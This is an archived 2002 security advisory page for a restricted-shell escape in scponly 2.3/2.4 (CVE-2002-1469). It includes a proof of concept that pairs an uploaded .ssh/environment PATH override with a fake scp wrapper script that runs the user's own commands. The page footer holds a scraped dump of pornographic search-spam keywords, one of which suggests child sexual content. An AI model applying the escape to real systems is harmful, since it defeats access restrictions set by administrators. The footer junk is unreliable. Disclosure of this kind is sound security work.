about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , SCPOnly SSH Environment Shell Escaping Vulnerability


Title SCPOnly SSH Environment Shell Escaping Vulnerability
Published 2002-08-20-12:00AM
Updated 2002-08-20-07:52PM
Class Configuration Error
CVE   CAN-2002-1469 CVE-2002-1469
Remote  No
Local  Yes
Credit  Vulnerability discovery credited to Derek D. Martin <ddm@pizzashack.org>.
Vulnerable  scponly scponly 2.4
scponly scponly 2.3
Not Vulnerable  
Code   The following was provided by Derek D. Martin <ddm@pizzashack.org>:

For example, the user could scp the following to
$HOME/.ssh/environment:

# ssh environment
PATH=/home/myhomedir/:/usr/bin:/bin
#end

Subsequently, the user could upload the following file to their home
directory, and call it scp:

#!/bin/sh

echo "I'm a bad boy" > /tmp/exploit
/usr/bin/scp $@

# end

When they next scp a file:

[root@restricted /tmp]
# ls -l
total 24
-rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit
[root@restricted /tmp]
# cat exploit
I'm a bad boy
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 16:57:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.89.kom www.th007. m...com/ch shekilasex Sexy viedi trisha bat WWW.SEX.VE kernakopor alsex.tv www.telugu yabb 2.1 200 /compo www www.ea movies xxx S.africa s Hotsexvide sex . x3x. xxl vedeo Web+Wiz+Fo soldjer bo Backup indiyablue www.tradme mdb forum latinas ca linux redh IGRAME www.adult/ Kiddysex.c donlowed c 200 /compo tamil acto mullumasal www.ussex. Www.Indian Trisha tam photp woma www.telugu Www sex 89 Gmbr porno yulia nova sexcymove WWW.SEXYIM mullumasal WWW.jp18.c sextv.pl hubli sex www.sexygi lo548l